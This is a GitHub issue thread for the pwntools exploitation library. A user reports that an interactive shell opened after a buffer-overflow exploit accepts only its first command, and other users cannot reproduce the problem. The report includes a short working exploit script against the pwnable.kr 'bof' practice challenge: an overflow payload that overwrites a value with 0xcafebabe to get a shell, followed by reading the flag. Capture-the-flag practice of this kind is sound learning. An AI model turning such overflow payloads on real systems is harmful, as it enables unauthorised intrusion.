### ISSUE TITLE
.interactive() shell only works for first command

### ISSUE THREAD

**Issue by DailyPS** [Gallopsled/pwntools#1843]
While using pwntools, I found that interactive shell only works at first command. After first command, any command inputs don't works. Attached image that shell works command ```ls``` but doesn't work command ```cat flag```.

My Linux Version : Ubuntu LTS 20.04
Python version :  3.8.5
pwntools version : 4.3.1

```bof.py```  used in image is below.

``` python
from pwn import *

p = remote('pwnable.kr', 9000)

payload = b"A" * 52 + p32(0xcafebabe)

p.sendline(payload)
p.interactive()
```

p.s. Sometimes it works additional command (after first command) but output is delayed. Could it be a network error?

![pwntools error](https://user-images.githubusercontent.com/55373035/110120496-77cdae00-7e00-11eb-8174-529474bbb7a8.PNG)

**Comment by 152334H** [comment]
![Screenshot_2021_0306_083247](https://user-images.githubusercontent.com/54623771/110188418-952d6700-7e56-11eb-9121-b86a8c8c2c87.jpg)

works on my machine, although I am using pwntools 4.5.0dev

**Comment by heapcrash** [comment]
Can't reproduce this on my end either.
